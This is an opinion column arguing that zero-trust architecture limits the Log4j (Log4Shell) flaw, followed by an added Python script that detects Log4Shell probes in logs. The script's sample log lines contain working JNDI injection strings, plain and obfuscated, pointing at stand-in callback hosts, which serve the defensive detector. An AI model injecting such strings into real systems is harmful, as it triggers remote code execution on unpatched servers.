How a true zero-trust architecture could have minimized the impact of Log4j – and still can
Just a few days ago, a zero-day vulnerability (CVE-2021-44228) was disclosed in the widely used Apache Log4j logging library. It allows unauthenticated remote code execution: vulnerable versions of the library evaluate JNDI lookups embedded in the strings they log, so an attacker only needs to get a crafted string into any logged field. The Apache Software Foundation released a patch and mitigation details so that information technology administrators could update their software quickly.
Because Log4j is embedded in so much enterprise Java software, this flaw can allow cybercriminals to cause devastating effects on organizations for many months to come. Unfortunately, zero-day vulnerabilities are discovered all the time.
The best way to protect enterprises is by minimizing the attack surface and removing the opportunity for attackers to exploit zero-day vulnerabilities and damaging lateral movement. This is why organizations relying only on legacy firewalls or web application firewalls to protect themselves are at much greater risk of damage than ones that have adopted a true zero-trust network architecture.
For those that are still not well-versed in zero-trust architecture, the best way to think about it is that it flips the networking model around to improve security. The internet is based on the concept that everything can talk to everything, which is why it works so well. But this also means that once an attacker is on a network, every endpoint on it is reachable. Zero trust dictates that nothing can talk to anything else without being explicitly allowed, and this minimizes the “blast radius” of a breach.
I’m using the qualifier “true,” as “zero trust” has become the latest security technology to be thrown around by a number of vendors that really don’t offer zero trust. True zero trust starts with validating user identity combined with business policy enforcement based on contextual data from user, device, app and content.
It uses a proxy architecture to “hide” applications from the network and inspects all traffic. The proxy can be thought of as a “switchboard” that maps users to apps to devices, while making them undiscoverable from the internet.
Firewalls and virtual private networks can segment the network, but if the segment is breached, everything in that segment is exposed. Achieving true zero trust with firewalls and VPNs would require creating a segment per app, device and user, which would be prohibitively complex, even for small networks. Even if one could set that up initially, every time a new connected endpoint or app was added, all the segmentation rules would need to be updated.
Cloud security vendor Zscaler Inc. was an early entrant to the market and has been the most aggressive at delivering a true zero-trust model. But the industry has seen the concept embraced by a wide range of companies, even nontraditional security providers. IBM Corp. has made zero trust one of its core security services and even graphics processing unit maker Nvidia Inc. has zero trust as part of its data center strategy.
With respect to Log4j, security researchers at Alibaba Cloud reported the flaw as a zero-day, meaning that until the emergency security update shipped, every customer running a vulnerable version was exposed. The vulnerability allows remote code execution with the privileges of whatever process embeds the library, which for many Java services means control of the application and all the data it holds. To exploit it, an attacker must first reach an application that logs attacker-controlled input, and then get the victim to connect back to an attacker-controlled server to fetch the payload; neither step is available when true zero trust hides the app from the internet and denies unexpected outbound connections.
I’ve talked to many security pros who like the concept but are concerned about complexity. It doesn’t have to be complex if it’s planned correctly. Here is a roadmap on how to adopt zero trust:
- Minimize your attack surface and make apps invisible. Rather than using a legacy WAF-based approach, organizations that make business-critical applications undiscoverable from the internet effectively eliminate the attack surface, and with it access for bad actors. When attackers cannot find an application or resource, they are unable to exploit it.
- Stop lateral movement with user-to-app and app-to-app connections: A true zero-trust model directly connects users to resources through a reverse tunnel and never puts users on the corporate network. Potential lateral spread of an infection is prevented when application access doesn’t allow any network access, even if an initial foothold has been established. Furthermore, a complete zero trust model extends the same zero trust policy to public cloud workloads through segmentation, stopping lateral movement within a data center or cloud environment.
- Detect and block malicious activity: By using a zero-trust architecture that inspects all internet-bound traffic, organizations can detect and block initial exploit attempts and prevent malicious post-compromise activity, such as data exfiltration. For Log4Shell specifically, the exploit needs the vulnerable host to reach back to an attacker-controlled LDAP, RMI or DNS server, so inspecting and default-denying outbound connections from application workloads breaks the chain even on a server that has not yet been patched.
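The third step above asks for detection of initial exploit attempts, and the second for denying the outbound connection the exploit relies on. The following is an added example, not code from the column or from any vendor it mentions: it scans constructed web-server log lines for Log4Shell probes, unwrapping the nested-lookup obfuscations (`${lower:j}`, `${::-j}`, `${env:NOPE:-j}`, percent-encoding) that defeat a plain `${jndi:` string match, and reports the callback host that a default-deny egress policy would need to block. The sample log lines, IP addresses and host names are constructed for the example.

```python
"""Detect Log4Shell (CVE-2021-44228) probes in request logs, including the
obfuscated lookup forms attackers use to evade a naive "${jndi:" match.
Added example; not code from the original column. Log lines below are constructed."""
import re
from urllib.parse import unquote

# An innermost ${...} lookup: its body contains no further "${" or "}".
INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# After normalisation: a JNDI lookup plus the scheme and host the victim would call.
JNDI_REF = re.compile(
    r"jndi:(ldaps?|rmi|dns|iiop|corba|nds|https?)://([^/:}\s\"]+)", re.I
)


def _resolve(body: str) -> str:
    """Evaluate one innermost lookup the way pre-2.15 Log4j 2 would, for the
    lookups attackers abuse for obfuscation. Anything else is unwrapped so its
    text (e.g. "jndi:ldap://...") survives for matching."""
    head, _, rest = body.partition(":")
    name = head.lower()
    if name == "lower":
        return rest.lower()
    if name == "upper":
        return rest.upper()
    if ":-" in body:  # ${env:NOPE:-j} or ${::-j}: undefined lookup, default value wins
        return body.rsplit(":-", 1)[1]
    return body


def normalize(text: str, max_rounds: int = 64) -> str:
    """Percent-decode once, then collapse nested lookups from the inside out.
    max_rounds bounds work on adversarial input with very deep nesting."""
    text = unquote(text)
    for _ in range(max_rounds):
        new = INNER_LOOKUP.sub(lambda m: _resolve(m.group(1)), text)
        if new == text:
            break
        text = new
    return text


def callback_host(line: str):
    """Return the host a vulnerable JVM would connect to for this line, or None."""
    m = JNDI_REF.search(normalize(line))
    return m.group(2).lower() if m else None


def scan(lines):
    """Return (line_number, callback_host) for every line carrying a JNDI lookup."""
    hits = []
    for n, line in enumerate(lines, 1):
        host = callback_host(line)
        if host:
            hits.append((n, host))
    return hits


# Constructed access-log lines; the last field stands in for the User-Agent header.
SAMPLE_LOG = [
    '198.51.100.20 - - "GET /index.html HTTP/1.1" 200 "Mozilla/5.0"',
    '198.51.100.21 - - "GET / HTTP/1.1" 200 "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.22 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:r}mi://203.0.113.6:1099/x}"',
    '198.51.100.23 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:dns://203.0.113.7/probe}"',
    '198.51.100.24 - - "GET /?x=%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D HTTP/1.1" 404 "-"',
    '198.51.100.25 - - "GET / HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for n, host in scan(SAMPLE_LOG):
        print(f"line {n}: JNDI probe, callback host {host}")
```

The normaliser models only the lookups attackers use for obfuscation, and a real detector should run over decoded request headers and bodies as well as the access log, since any logged field (User-Agent, X-Forwarded-For, form parameters) is a valid injection point. The callback hosts it reports are exactly the connections a per-app egress allowlist would deny, which is why blocking unexpected outbound LDAP, RMI and DNS from application workloads contains the exploit before a patch is applied.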
Businesses that want to protect their enterprise from zero-day vulnerabilities should stop relying on firewalls and VPNs, which were not designed for this kind of threat, and embrace a true zero-trust architecture.
Zeus Kerravala is a principal analyst at ZK Research, a division of Kerravala Consulting. He wrote this column for SiliconANGLE.